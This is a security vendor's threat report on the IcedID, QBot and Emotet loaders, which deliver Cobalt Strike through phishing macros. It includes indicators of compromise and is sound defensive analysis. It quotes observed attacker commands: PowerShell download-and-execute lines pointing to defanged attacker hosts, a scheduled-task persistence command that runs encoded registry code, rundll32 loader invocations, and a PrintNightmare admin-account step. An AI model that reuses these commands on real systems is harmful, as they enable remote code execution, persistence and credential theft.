The Cybereason Global Security Operations Center Team (GSOC) issues Cybereason Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
In this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving malicious actors used the malware loaders IcedID, QBot, and Emotet to deploy the Cobalt Strike framework on the compromised systems.
The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s high damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group.
Cobalt Strike is an adversary simulation framework with the primary use case of assisting red team operations. However, Cobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a modular framework with an extensive set of features that are useful to malicious actors, such as command execution, process injection, and credential theft.
The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once Cobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to other threat actors, including ransomware group affiliates.
In the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack scenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems (i.e. malware loaders) to deploy Cobalt Strike on the systems.
In this article, we present the activities of the malware loaders and the malicious actors that operated the loaders in three selected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the deployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group.
Malicious actors use the IcedID malware to distribute various types of malware, including ransomware, to compromised systems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in phishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as reconnaissance activities and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt Strike on compromised systems.
QBot, also known as Qakbot, is a malware that has been present on the threat landscape since 2007. QBot originally featured information stealing and trojan functionalities, however, the malicious actors that develop QBot have extended the malware with malware loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious attachments in phishing emails. QBot downloads and executes additional malware on compromised machines, such as the Cobalt Strike framework, and ransomware, such as REvil and ProLock.
Since security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking Trojan to a malware loader. Over the last few years, before authorities disrupted the infrastructure of Emotet operators as part of a global operation in the first quarter of 2021, malicious actors have been using Emotet to deliver the Ryuk ransomware to compromised systems.
On November 15, 2021, security researchers announced the discovery of a new variant of Emotet on the threat landscape. The Cybereason GSOC team observed attack scenarios that involved the new Emotet malware shortly thereafter, which involved Emotet deploying Cobalt Strike on compromised systems.
The figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this scenario, the malicious actors, who we attribute as affiliates of the Conti ransomware group, specifically targeted a user by sending the user an email with an attachment (an Excel document) that is almost identical to a legitimate email and email attachment already distributed to other users within the organization.
The difference was that the attached Excel document contained a malicious macro. This indicates a potential long-term presence of the actors in the environment:
When the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an attacker-controlled endpoint and then executed the file. The macro downloaded the IcedID executable to the home directory of the user, such as C:\Users\test\javabridge64.exe, where javabridge64.exe is the name of the IcedID executable and C:\Users\test is the home directory of the user test:
Approximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the SysInfo IcedID command to enumerate relevant system information, such as active processes, and to conduct the following reconnaissance activities:
Approximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the ExecAdmin IcedID command that attempts to elevate user privileges using a known Windows User Account Control (UAC) bypass that leverages the fodhelper Windows utility.
After approximately 5 minutes, the malicious actors executed the Exec IcedID command to execute code by injecting the code into a cmd.exe instance. Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the command rundll32 adobe.dll,kasim (where kasim is a dynamic-link library - DLL - entry point):
A few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the attacker-controlled endpoint with an IP address of 185.70.184[.]8 by executing the PowerShell command:
IEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a')).
This attributes the actors as Conti affiliates, since the Conti group operated the endpoint with the IP address 185.70.184[.]8 in the week when the attack that we discussed took place. In addition, the security community has observed Conti affiliates using the IcedID malware to deploy Cobalt Strike on compromised systems.
To deploy the IcedID malware, the Conti affiliates targeted a particular user. At a larger scale, in the middle of 2021, we observed malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign, which we discuss in the following section.
This “stolen images evidence” campaign involved phishing emails that legitimate organization contact forms had generated and sent to the targeted users – the contact form recipient. The emails contained legal threats related to copyright infringement due to the use of copyright-protected images that the targeted user had apparently stolen. The emails urged the recipient to sign into a Google page that supposedly lists the images. After the user signed into the page using valid Google credentials, the page downloaded and executed a malicious JavaScript (.js) script using the Windows wscript utility.
The script executed a Base64-encoded PowerShell command to download and execute the IcedID malware, for example:
IEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php’).
The execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry point, such as:
rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer.
This DLL conducted the first stage of deployment of the IcedID malware and we refer to it as first-stage IcedID DLL:
The first-stage DLL gathered information about the compromised machine, such as hardware and operating system information, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was encrypted using a symmetric encryption key.
The first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that typically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s %LocalAppData% directory, such as:
C:\Users\user\AppData\Local\Temp\rebuildx32.tmp, and the license.dat file in the user’s %AppData% directory.
The first-stage IcedID DLL then executed the DLL file, such as:
rundll32.exe “C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update /i:"ApproveFinish\license.dat", which we refer to as second-stage IcedID DLL.
The main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. license.dat contained encrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat and executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe:
The figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike:
Malicious actors distribute QBot as attachments, typically Microsoft Office Excel documents, to phishing emails. The Office Excel application prompts the user that has opened the document that distributes QBot to enable Office macro execution. When the Office macro executes, the macro first downloads the QBot malware from an attacker-controlled endpoint and then executes the malware.
In the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the %ProgramData% directory, such as C:\ProgramData, with the filename extension .ocx - Volet1.ocx (other names include, for example, Volet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows utility. The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities.
In addition, the DLL injected stager_1.dll into a legitimate Windows process - msra.exe:
Approximately 6 minutes after injecting stager_1.dll into msra.exe, Qbot conducted reconnaissance activities by executing the commands net, arp, ipconfig, netstat, nslookup, route, and whoami. The figure below depicts the execution of these commands, including command line parameters:
Approximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised system by executing the following command:
schtasks.exe /Create /F /TN "{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Cvdijvkees).omowidpdnpcwb))) " /SC MINUTE /MO 30
This command creates a scheduled task named {AO8F7C8F-D95F-4395-8732-9818EO0F3DB2} that periodically executes Base64-encoded PowerShell code stored in the registry key HKEY_CURRENT_USER\SOFTWARE\Cvdijvkees.
Approximately 48 minutes after creating a scheduled task, Qbot injected Rubeus, a tool for attacking Kerberos deployments, into the legitimate Windows Update process wuauclt.exe. After approximately 18 minutes, QBot stole web browser data, such as cookies and browsing history, using the recovery functionality of the esentutl Windows utility.
After approximately 2 minutes, QBot attempted to exploit the PrintNightmare vulnerability by executing the Invoke-Nightmare PowerShell command to create an administrative user with the username admin1 and password Password.
After approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attacker-controlled endpoints known to be associated with Cobalt Strike at the time the attack took place:
The figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike:
Malicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails. In addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files that store Office documents, and Universal Windows Application installation packages that download and execute Emotet when a user executes the installation package:
If an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the document to enable Office macro execution:
When the user enables macro execution, a malicious Office macro that is part of the Word document and that distributes Emotet executes. The macro first deobfuscates macro code by removing character arrays, such as Cew (see the figure below), and then executes the deobfuscated macro code:
The de-obfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the %ProgramData% directory, such as C:\ProgramData.
Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores under a random filename in the %ProgramData% directory. The PowerShell code then uses the rundll32 Windows utility to execute Emotet:
Alternatively to executing the PowerShell code directly, the de-obfuscated macro code may first create a Windows Batch (.bat) file in the %ProgramData% directory under a random name, such as C:\ProgramData\sdfhiuwu.bat or yksds.bat, and then execute the file. The .bat file stores obfuscated code that includes Base-64 encoded code and code that is stored in multiple string variables.
The obfuscated code in the .bat file executes the PowerShell code that downloads and then uses the rundll32 Windows utility to execute Emotet:
The PowerShell code uses the rundll32 Windows utility and specifies the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the internal name of X.dll:
If an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document to enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office macros that distribute Emotet.
When the user enables macro execution, the Office macros execute:
The macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the extension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx.
The macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (&) character to individual characters of the name:
When Emotet executes on a compromised system, the malware first establishes persistence by creating system services that start at system startup or by creating registry values at the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key:
Emotet then executes processes that conduct malicious activities. The processes that Emotet executes have random names and are children processes of the process of the rundll32 utility that executes Emotet.
In the attack scenario that we analyzed, Emotet executed a process that steals cookies or web and email credentials from client credential databases. Emotet used the keyword scomma in the process command line to execute WebBrowserPassView, a tool that steals web credentials from browser credential databases. Emotet then exfiltrated data from the compromised system to attacker-controlled endpoints:
After Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system. Emotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the DllRegisterServer DLL entry point.
The Cybereason XDR Platform is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection that detects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities:
The Cybereason GSOC recommends the following:
Cybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to everywhere. Schedule a demo today to learn how your organization can benefit from an operation-centric approach to security.
Executables |
SHA-1 hash: a4d415c07b4ff77c6bd792c32fc46bfc6a1b0354 SHA-1 hash: e8992a283f9f37dec617b305db2790d9112d3a20 |
Domains |
zasewalli[.]fun endofyour[.]ink pedrosimanez[.]fun kingflipp[.]online beliale232634[.]at belialw869367[.]at belialq449663[.]at |
IP Addresses |
23.111.114[.]52 104.168.44[.]130 185.70.184[.]8 |
Initial Access |
Execution |
Persistence |
Defense Evasion |
Credential Access |
Discovery |
Lateral Movement |
Exfiltration |
Abuse Elevation Control Mechanism: Bypass User Account Control |
Remote Services: Remote Desktop Protocol |
||||||
Eli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber security industry since 2017. In his free time, he publishes articles about malware research and threat hunting.
Aleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research activities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for Science, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion detection and reverse engineering security mechanisms of the Windows operating system.
Brian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages security incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the current threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information & Cyber.
Yonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware analysis, digital forensics, and incident response.
Rotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis activities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious operations prevalent in the current threat landscape. Rotem has been working in the cybersecurity industry since 2018.